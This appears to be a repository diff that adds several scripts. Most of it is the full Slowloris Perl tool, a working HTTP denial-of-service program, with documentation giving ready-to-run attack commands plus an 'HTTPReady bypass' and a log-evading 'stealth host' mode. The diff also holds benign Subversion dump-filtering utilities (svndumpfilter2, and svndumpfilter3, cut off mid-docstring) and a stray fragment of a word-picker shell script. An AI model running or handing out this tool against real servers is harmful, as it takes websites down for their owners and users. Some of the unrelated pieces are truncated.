rnum=$(($RANDOM*$RANDOM))
let "rnum %= $tL"
sed -n "$rnum p" $WORDFILE
done

463
slowloris.pl Executable file
View File

@ -0,0 +1,463 @@
#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;
$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
print <<EOTEXT;
CCCCCCCCCCOOCCOOOOO888\@8\@8888OOOOCCOOO888888888\@\@\@\@\@\@\@\@\@8\@8\@\@\@\@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888\@888888OOOCCCOOOO888888888888\@88888\@\@\@\@\@\@\@888\@8OOCCoococc:::
CCCCCCCCCCCCCCOO88\@\@888888OOOOOOOOOO8888888O88888888O8O8OOO8888\@88\@\@8OOCOOOCoc::
CCCCooooooCCCO88\@\@8\@88\@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888\@8888OOOCc::::
CooCoCoooCCCO8\@88\@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88\@88888\@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88\@888OCoccc
ooooCCOO8O888888888\@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88\@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88\@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8\@\@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8\@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8\@\@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8\@8\@8Ooc:.:...cOO8O88c. . .coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888\@8\@88888888Oo:. . ...cO888Oc.. :oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888\@88888888888Oo:. .O8888C: .oCOo. ...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo: :. .:..ccoCCCooCooccooccccoooooCCCC
coooCCO8\@88OO8O888Oo:::... .. :cO8Oc. . ..... :. .:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8\@8Coc::.. .... ..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8\@8OOCCOc:... ....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8\@8\@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888\@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
..... ............. .coocoooCCoco:::ccccccc:::ccc::.......... ....:::cc::::coC
. . ... .... .. .:cccoCooc:.. ::cccc:::c:.. ......... ......::::c:cccco
. .. ... .. .. .. ..:...:cooc::cccccc:..... ......... .....:::::ccoocc
. . .. ..::cccc:.::ccoocc:. ........... .. . ..:::.:::::::ccco
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client
EOTEXT
my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
my $result = GetOptions(
'shost=s' => \$shost,
'dns=s' => \$host,
'httpready' => \$httpready,
'num=i' => \$connections,
'cache' => \$cache,
'port=i' => \$port,
'https' => \$ssl,
'tcpto=i' => \$tcpto,
'test' => \$test,
'timeout=i' => \$timeout,
'version' => \$version,
);
if ($version) {
print "Version 0.7\n";
exit;
}
unless ($host) {
print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
print "\n\tType 'perldoc $0' for help with options.\n\n";
exit;
}
unless ($port) {
$port = 80;
print "Defaulting to port 80.\n";
}
unless ($tcpto) {
$tcpto = 5;
print "Defaulting to a 5 second tcp connection timeout.\n";
}
unless ($test) {
unless ($timeout) {
$timeout = 100;
print "Defaulting to a 100 second re-try timeout.\n";
}
unless ($connections) {
$connections = 1000;
print "Defaulting to 1000 connections.\n";
}
}
my $usemultithreading = 0;
if ( $Config{usethreads} ) {
print "Multithreading enabled.\n";
$usemultithreading = 1;
use threads;
use threads::shared;
}
else {
print "No multithreading capabilites found!\n";
print "Slowloris will be slower than normal as a result.\n";
}
my $packetcount : shared = 0;
my $failed : shared = 0;
my $connectioncount : shared = 0;
srand() if ($cache);
if ($shost) {
$sendhost = $shost;
}
else {
$sendhost = $host;
}
if ($httpready) {
$method = "POST";
}
else {
$method = "GET";
}
if ($test) {
my @times = ( "2", "30", "90", "240", "500" );
my $totaltime = 0;
foreach (@times) {
$totaltime = $totaltime + $_;
}
$totaltime = $totaltime / 60;
print "This test could take up to $totaltime minutes.\n";
my $delay = 0;
my $working = 0;
my $sock;
if ($ssl) {
if (
$sock = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
else {
if (
$sock = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
if ($working) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"GET /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
if ( print $sock $primarypayload ) {
print "Connection successful, now comes the waiting game...\n";
}
else {
print
"That's odd - I connected but couldn't send the data to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
}
else {
print "Uhm... I can't connect to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
for ( my $i = 0 ; $i <= $#times ; $i++ ) {
print "Trying a $times[$i] second delay: \n";
sleep( $times[$i] );
if ( print $sock "X-a: b\r\n" ) {
print "\tWorked.\n";
$delay = $times[$i];
}
else {
if ( $SIG{__WARN__} ) {
$delay = $times[ $i - 1 ];
last;
}
print "\tFailed after $times[$i] seconds.\n";
}
}
if ( print $sock "Connection: Close\r\n\r\n" ) {
print "Okay that's enough time. Slowloris closed the socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
else {
print "Remote server closed socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
if ( $delay < 166 ) {
print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally
takes between 200-500 threads for most servers and assuming any latency at
all... you might have trouble using Slowloris against this target. You can
tweak the -timeout flag down to less than 10 seconds but it still may not
build the sockets in time.
EOSUCKS2BU
}
}
else {
print
"Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
if ($usemultithreading) {
domultithreading($connections);
}
else {
doconnections( $connections, $usemultithreading );
}
}
sub doconnections {
my ( $num, $usemultithreading ) = @_;
my ( @first, @sock, @working );
my $failedconnections = 0;
$working[$_] = 0 foreach ( 1 .. $num ); #initializing
$first[$_] = 0 foreach ( 1 .. $num ); #initializing
while (1) {
$failedconnections = 0;
print "\t\tBuilding sockets.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 0 ) {
if ($ssl) {
if (
$sock[$z] = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
}
else {
$working[$z] = 0;
}
}
else {
if (
$sock[$z] = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
$packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
}
else {
$working[$z] = 0;
}
}
if ( $working[$z] == 1 ) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"$method /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
my $handle = $sock[$z];
if ($handle) {
print $handle "$primarypayload";
if ( $SIG{__WARN__} ) {
$working[$z] = 0;
close $handle;
$failed++;
$failedconnections++;
}
else {
$packetcount++;
$working[$z] = 1;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
}
print "\t\tSending data.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 1 ) {
if ( $sock[$z] ) {
my $handle = $sock[$z];
if ( print $handle "X-a: b\r\n" ) {
$working[$z] = 1;
$packetcount++;
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
}
print
"Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
sleep($timeout);
}
}
sub domultithreading {
my ($num) = @_;
my @thrs;
my $i = 0;
my $connectionsperthread = 50;
while ( $i < $num ) {
$thrs[$i] =
threads->create( \&doconnections, $connectionsperthread, 1 );
$i += $connectionsperthread;
}
my @threadslist = threads->list();
while ( $#threadslist > 0 ) {
$failed = 0;
}
}
__END__
=head1 TITLE
Slowloris
=head1 VERSION
Version 0.7 Beta
=head1 DATE
06/17/2009
=head1 AUTHOR
RSnake <h@ckers.org> with threading from John Kinsella
=head1 ABSTRACT
Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons.
=head1 AFFECTS
Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...?
=head1 NOT AFFECTED
IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?
=head1 DESCRIPTION
Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it's threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well.
As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood.
=head2 Testing
If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:
=head3 Testing Example:
./slowloris.pl -dns www.example.com -port 80 -test
This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing).
=head2 HTTP DoS
Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though.
=head3 HTTP DoS Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
=head2 HTTPReady Bypass
HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch.
=head3 HTTPReady Bypass Example
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready
=head2 Stealth Host DoS
If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately.
=head3 Stealth Host DoS Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com
=head2 HTTPS DoS
Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary.
=head3 HTTPS DoS Example:
./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
=head2 HTTP Cache
Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary.
=head3 HTTP Cache Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
=head1 Issues
Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it's current incarnation. They may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested.
Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder). So it's not invisible if the traffic to the site is typically fairly low. On higher traffic sites it will unlikely that it is noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture.
For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems. Either way, this program seems to work best if run from FreeBSD.
Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to it's logs with a lot of 400 (Bad Request) errors. So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too.
=head1 What is a slow loris?
What exactly is a slow loris? It's an extremely cute but endangered mammal that happens to also be poisonous. Check this out:
http://www.youtube.com/watch?v=rLdQ3UhLoD4

439
svndumpfilter2 Executable file
View File

@ -0,0 +1,439 @@
#!/usr/bin/env python
# Utility to filter a dump file of a Subversion repository to
# produce a dump file describing only specified subdirectories of
# the tree contained in the original one. This is similar in
# concept to the official tool `svndumpfilter', but it's able to
# cope with revisions which copy files into the area of interest
# from outside it (in which situation a Node-copyfrom won't be
# valid in the output dump file). However, in order to support
# this, svndumpfilter2 requires access via `svnlook' to the
# original repository from which the input dump file was produced.
#
# Usage:
#
# svndumpfilter [options] source-repository regexp [regexp...]
#
# This command expects to receive a Subversion dump file on
# standard input, which must correspond to the Subversion
# repository pointed to by the first argument. It outputs a
# filtered dump file on standard output.
#
# `source-repository': The first argument must be a pathname to a
# _local_ Subversion repository. That is, it isn't a Subversion URL
# (beginning with http:// or svn:// or anything else like that);
# it's a simple local pathname (absolute or relative). A simple
# test to see if it's a valid pathname is to pass it as an argument
# to `svnlook tree'. If that succeeds, it's also a valid first
# argument to svndumpfilter2.
#
# `regexp': The remaining arguments are used to select directory
# names from the top level of the repository's internal directory
# tree. Any directory matching any of the regexps will be
# considered `interesting' and copied into the output dump file;
# any directory not matching will not. Matching is performed at the
# top level only: it is not currently possible to selectively
# include a subset of second-level directories with a common
# parent.
#
# Options include:
#
# `--drop-empty-revs': Exclude empty revisions from the output.
#
# `--renumber-revs': Generated sequential revision numbers in the
# filtered output. This may help work around issues with certain
# versions of 'svnadmin load'.
#
# For example, this command...
#
# svndumpfilter2 /home/svnadmin/myrepos foo bar baz quu+x
#
# ... will read a dump file on standard input, and output one on
# standard output which contains only the subdirectories `foo',
# `bar', `baz', `quux', `quuux', `quuuux', etc.
#
# You will probably usually want to use svndumpfilter2 in
# conjunction with the production of the dump file in the first
# place, like this:
#
# svnadmin dump /home/svnadmin/myrepos | \
# svndumpfilter2 /home/svnadmin/myrepos foo bar baz quu+x > msv.dump
import sys
import os
import re
import string
import types
import md5
from optparse import OptionParser
# Quoting function which should render any string impervious to
# POSIX shell metacharacter expansion.
def quote(word):
return "'" + string.replace(word, "'", "'\\''") + "'"
# First, the sensible way to deal with a pathname is to split it
# into pieces at the slashes and thereafter treat it as a list.
def splitpath(s):
list = string.split(s, "/")
# Simplest way to remove all empty elements!
try:
while 1:
list.remove("")
except ValueError:
pass
return list
def joinpath(list, prefix=""):
return prefix + string.join(list, "/")
def cleanpath(s):
return joinpath(splitpath(s))
def catpath(path1, path2, prefix=""):
return joinpath(splitpath(path1) + splitpath(path2), prefix)
# Decide whether a pathname is interesting or not.
class InterestingPaths:
def __init__(self, args):
self.res = []
for a in args:
self.res.append(re.compile(a))
def interesting(self, path):
path = cleanpath(path)
if path == '':
# It's possible that the path may have no elements at
# all, in which case we can't match on its first
# element. This generally occurs when svn properties
# are being changed on the root of the repository; we
# consider those to be always interesting and never
# filter them out.
return 1
for r in self.res:
if r.match(path):
return 1
return 0
# A class and some functions to handle a single lump of
# RFC822-ish-headers-plus-data read from an SVN dump file.
class Lump:
def __init__(self):
self.hdrlist = []
self.hdrdict = {}
self.prop = ""
self.text = None
self.extant = 1
self.props = [[], {}]
def sethdr(self, key, val):
if not self.hdrdict.has_key(key):
self.hdrlist.append(key)
self.hdrdict[key] = val
def delhdr(self, key):
if self.hdrdict.has_key(key):
del self.hdrdict[key]
self.hdrlist.remove(key)
def propparse(self):
index = 0
while 1:
if self.prop[index:index+2] == "K ":
wantval = 1
elif self.prop[index:index+2] == "D ":
wantval = 0
elif self.prop[index:index+9] == "PROPS-END":
break
else:
raise "Unrecognised record in props section"
nlpos = string.find(self.prop, "\n", index)
assert nlpos > 0
namelen = string.atoi(self.prop[index+2:nlpos])
assert self.prop[nlpos+1+namelen] == "\n"
name = self.prop[nlpos+1:nlpos+1+namelen]
index = nlpos+2+namelen
if wantval:
assert self.prop[index:index+2] == "V "
nlpos = string.find(self.prop, "\n", index)
assert nlpos > 0
proplen = string.atoi(self.prop[index+2:nlpos])
assert self.prop[nlpos+1+proplen] == "\n"
prop = self.prop[nlpos+1:nlpos+1+proplen]
index = nlpos+2+proplen
else:
prop = None
self.props[0].append(name)
self.props[1][name] = prop
def setprop(self, key, val):
if not self.props[1].has_key(key):
self.props[0].append(key)
self.props[1][key] = val
def delprop(self, key):
if self.props[1].has_key(key):
del self.props[1][key]
self.props[0].remove(key)
def correct_headers(self, revmap):
# First reconstitute the properties block.
self.prop = ""
if (not (self.props is None)) and len(self.props[0]) > 0:
for key in self.props[0]:
val = self.props[1][key]
if val == None:
self.prop = self.prop + "D %d" % len(key) + "\n" + key + "\n"
else:
self.prop = self.prop + "K %d" % len(key) + "\n" + key + "\n"
self.prop = self.prop + "V %d" % len(val) + "\n" + val + "\n"
self.prop = self.prop + "PROPS-END\n"
# Now fix up the content length headers.
if len(self.prop) > 0:
self.sethdr("Prop-content-length", str(len(self.prop)))
else:
self.delhdr("Prop-content-length")
# Only fiddle with the md5 if we're not doing a delta.
if self.hdrdict.get("Text-delta", "false") != "true":
if self.text != None:
self.sethdr("Text-content-length", str(len(self.text)))
m = md5.new()
m.update(self.text)
self.sethdr("Text-content-md5", m.hexdigest())
else:
self.delhdr("Text-content-length")
self.delhdr("Text-content-md5")
if len(self.prop) > 0 or self.text != None:
if self.text == None:
textlen = 0
else:
textlen = len(self.text)
self.sethdr("Content-length", str(len(self.prop)+textlen))
else:
self.delhdr("Content-length")
# Adjust the revision numbers as needed.
for header in ["Revision-number", "Node-copyfrom-rev"]:
if self.hdrdict.has_key(header):
old_val = int(self.hdrdict[header])
if revmap != None:
new_val = revmap[old_val]
else:
new_val = old_val
self.sethdr(header, str(new_val))
def read_rfc822_headers(f):
ret = Lump()
while 1:
s = f.readline()
if s == "":
return None # end of file
if s == "\n":
if len(ret.hdrlist) > 0:
break # newline after headers ends them
else:
continue # newline before headers is simply ignored
if s[-1:] == "\n": s = s[:-1]
colon = string.find(s, ":")
assert colon > 0
assert s[colon:colon+2] == ": "
key = s[:colon]
val = s[colon+2:]
ret.sethdr(key, val)
return ret
def read_lump(f):
lump = read_rfc822_headers(f)
if lump == None:
return None
pcl = string.atoi(lump.hdrdict.get("Prop-content-length", "0"))
if pcl > 0:
lump.prop = f.read(pcl)
lump.propparse()
if lump.hdrdict.has_key("Text-content-length"):
tcl = string.atoi(lump.hdrdict["Text-content-length"])
lump.text = f.read(tcl)
return lump
def write_lump(f, lump, revmap):
if not lump.extant:
return
lump.correct_headers(revmap)
for key in lump.hdrlist:
val = lump.hdrdict[key]
f.write(key + ": " + val + "\n")
f.write("\n")
f.write(lump.prop)
if lump.text != None:
f.write(lump.text)
if lump.hdrdict.has_key("Prop-content-length") or \
lump.hdrdict.has_key("Text-content-length") or \
lump.hdrdict.has_key("Content-length"):
f.write("\n")
# Higher-level class that makes use of the above to filter dump
# file fragments a whole revision at a time.
class Filter:
def __init__(self, paths):
self.revisions = {}
self.paths = paths
def tweak(self, revhdr, contents):
contents2 = []
for lump in contents:
action = lump.hdrdict["Node-action"]
path = lump.hdrdict["Node-path"]
if not self.paths.interesting(path):
continue # boooring
need = 1 # we need to do something about this lump
if action == "add":
if lump.hdrdict.has_key("Node-copyfrom-path"):
srcrev = string.atoi(lump.hdrdict["Node-copyfrom-rev"])
srcpath = lump.hdrdict["Node-copyfrom-path"]
if not self.paths.interesting(srcpath):
# Copy from a boring path to an interesting
# one, meaning we must use svnlook to
# extract the subtree and convert it into
# lumps.
treecmd = "svnlook tree -r%d %s %s" % \
(srcrev, quote(repos), quote(srcpath))
tree = os.popen(treecmd, "r")
pathcomponents = []
while 1:
treeline = tree.readline()
if treeline == "": break
if treeline[-1:] == "\n": treeline = treeline[:-1]
subdir = 0
while treeline[-1:] == "/":
subdir = 1
treeline = treeline[:-1]
depth = 0
while treeline[:1] == " ":
depth = depth + 1
treeline = treeline[1:]
pathcomponents[depth:] = [treeline]
thissrcpath = string.join([srcpath] + pathcomponents[1:], "/")
thisdstpath = string.join([path] + pathcomponents[1:], "/")
newlump = Lump()
newlump.sethdr("Node-path", thisdstpath)
newlump.sethdr("Node-action", "add")
props = os.popen("svnlook pl -r%d %s %s" % \
(srcrev, quote(repos), quote(thissrcpath)), "r")
while 1:
propname = props.readline()
if propname == "": break
if propname[-1:] == "\n": propname = propname[:-1]
while propname[:1] == " ": propname = propname[1:]
propf = os.popen("svnlook pg -r%d %s %s %s" % \
(srcrev, quote(repos), quote(propname), quote(thissrcpath)), "r")
proptext = propf.read()
propf.close()
newlump.setprop(propname, proptext)
props.close()
if subdir:
newlump.sethdr("Node-kind", "dir")
else:
newlump.sethdr("Node-kind", "file")
f = os.popen("svnlook cat -r%d %s %s" % \
(srcrev, quote(repos), quote(thissrcpath)), "r")
newlump.text = f.read()
f.close()
contents2.append(newlump)
tree.close()
if lump.text != None:
# This was a copyfrom _plus_ some sort of
# delta or new contents, which means that
# having done the copy we now also need a
# change record providing the new contents.
lump.sethdr("Node-action", "change")
lump.delhdr("Node-copyfrom-rev")
lump.delhdr("Node-copyfrom-path")
else:
need = 0 # we have now done something
if need:
contents2.append(lump)
# Change the contents array.
contents[:] = contents2
# If we've just removed everything in this revision, leave
# out some revision properties as well.
if (len(contents) == 0):
revhdr.delprop("svn:log")
revhdr.delprop("svn:author")
revhdr.delprop("svn:date")
fr = sys.stdin
fw = sys.stdout
# Parse our command-line arguments.
parser = OptionParser(usage="Usage: %prog [options] src-repo regexp...")
parser.add_option("--drop-empty-revs", action="store_true",
dest="drop_empty_revs", default=False,
help="filter empty revisions from the dump")
parser.add_option("--renumber-revs", action="store_true",
dest="renumber_revs", default=False,
help="renumber remaining revisions")
(options, args) = parser.parse_args()
if len(args) < 2:
print >>sys.stderr, sys.argv[0] + ": Too few arguments."
print >>sys.stderr, parser.usage
sys.exit(2)
repos = args[0]
paths = InterestingPaths(args[1:])
# We use this table to map input revisions to output revisions.
if options.renumber_revs:
revmap = {}
else:
revmap = None
# Pass the dump-file header through unchanged.
lump = read_lump(fr)
while not lump.hdrdict.has_key("Revision-number"):
write_lump(fw, lump, revmap)
lump = read_lump(fr)
revhdr = lump
filt = Filter(paths)
current_output_rev = 0
while revhdr != None:
# Read revision header.
assert revhdr.hdrdict.has_key("Revision-number")
contents = []
# Read revision contents.
while 1:
lump = read_lump(fr)
if lump == None or lump.hdrdict.has_key("Revision-number"):
newrevhdr = lump
break
contents.append(lump)
# Alter the contents of the revision.
filt.tweak(revhdr, contents)
# Determine whether we should output this revision. We only
# update the current_output_rev if we're actually going to write
# something.
should_write = (len(contents) > 0 or not options.drop_empty_revs)
if should_write:
current_output_rev += 1
# Update our revmap with information about this revision. Note that
# if this revision won't be written, current_output_rev still points
# to the last version we dumped.
input_rev = int(revhdr.hdrdict["Revision-number"])
if revmap != None:
revmap[input_rev] = current_output_rev
# Write out this revision, if that's what we've decided to do.
if should_write:
write_lump(fw, revhdr, revmap)
for lump in contents:
write_lump(fw, lump, revmap)
# And loop round again.
revhdr = newrevhdr
fr.close()
fw.close()

906
svndumpfilter3 Executable file
View File

@ -0,0 +1,906 @@
#!/usr/bin/env python
#encoding:UTF-8
#
# Copyright (C) 2006 Martin Blais <blais at furius dot ca>
# 2008-02: Improvements by "Giovanni Bajo" <rasky at develer dot com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
"""svndumpfilter3 [<options>] [<path> ...]
A rewrite of Subversion's svndumpfilter in pure Python, that allows you to
untangle move/copy operations between excluded and included sets of files/dirs,
by converting them into additions. If you use this option, it fetches the
original files from a given repository.
.. important::
Some people have been reporting a bug with this script, that it will create
an empty file on a large repository. It worked great for the split that I
had to do on my repository, but I have no time to fix the problem that occurs
for some other people's repositories (I really, really do not have the time
to work on this). If you find the glitch, please send me a patch. I think
the problem is likely to be a minor one. If you need this for your business
and you're willing to pay hourly rates, I might be able to find someone to
work on it (perhaps me (http://furius.ca/home/consulting.html), depending on
schedule).
The list of <path> paths are the paths to filter in the repository. You pipe
the dumpfile through stdin. If you want to untangle the copy operations, you
need a live repository and to use --untangle=REPOS_PATH. Like this::
cat dumpfile | svndumpfilter3 --untangle=/my/svnroot project1 project2
The paths can include wildcards, and can consist of multiple parts, like::
cat dumpfile | svndumpfilter3 tags/proj.*/subproj trunk/subproj
Each component of the path is seperated and matched separately (hence the above
would match for instance tags/proj-1.2/subproj but not tags/proj-1.2/a/subproj).
.. note::
This script's interface is only slightly different than Subversion's
svndumpfilter, it does not take subcommands; its default behaviour is that
of the 'include' subcommand of svndumpfilter. If you need 'exclude'
behaviour, just invoke it with the --exclude option.
This is useful if you want to split a repository for which files have been
copied or moved between filtered and non-filtered locations. The resulting dump
would be illegal if we just ignored these, because Subversion records the
copy/move operations only.
Chapter 5 hints about this, for more details about the problem, see there:
Also, copied paths can give you some trouble. Subversion supports
copy operations in the repository, where a new path is created by
copying some already existing path. It is possible that at some
point in the lifetime of your repository, you might have copied a
file or directory from some location that svndumpfilter is
excluding, to a location that it is including. In order to make
the dump data self-sufficient, svndumpfilter needs to still show
the addition of the new path including the contents of any files
created by the copy-and not represent that addition as a copy from
a source that won't exist in your filtered dump data stream. But
because the Subversion repository dump format only shows what was
changed in each revision, the contents of the copy source might
not be readily available. If you suspect that you have any copies
of this sort in your repository, you might want to rethink your
set of included/excluded paths.
Future Work
-----------
* We still need to implement the per-subcommand options of svndumpfilter. Feel
free to do so if you need it, or contact Martin Blais for subcontracting (I
will do this for money, right now I have no time).
Credits
-------
This code is originally based on Simon Tatham's svndumpfilter2, but we
significantly changed the main loop and are using 'svnadmin dump' to fetch old
revisions rather than working recursively with 'svnlook cat'. The problem I was
having was that svndumpfilter2 was running out of memory so I had to rewrite it.
svndumpfilter2 tracks all files itself in order to replicate the required
revisions, and it uses ``svnlook cat`` to fetch them, which is fast. This
consumes a lot of memory (I could not run it on a 126MB repository with 2800
revisions on my P4 1GB RAM server). svndumpfilter3 does not track the revisions
itself, instead it uses ``svnadmin dump`` with the original svndumpfilter to
produce the necessary lumps to insert them in the output. This operation is
much slower, but it does not matter if you have relatively few move/copy
operations between excluded directories, which I think is by far the common case
for multiple project roots (it was my case).
[2009-01-08] An bugfix patch was provided by Jamie Townsend <jtownsen at
progress dot com>.
[2009-04-05] Minor path matching improvements by Matthias Troffaes <matthias
dot troffaes at gmail dot com>
Important Note
--------------
I cannot guarantee anything about your data (see the legal terms above). If you
lose data by using this program, THAT IS YOUR OWN PROBLEM. Do not forget to
MAKE BACKUPS in case something goes wrong. This is your own responsibility.
Always make backups.
[2009-09-18]
Here is a note from a user about a potential problem with the preservation of
properties, with the >100 hr/week workload, I have no time to look into it at
the moment:
From "Földvári György"
To blais@furius.ca
Subject Critical bug in svndumpfilter3? Show full header
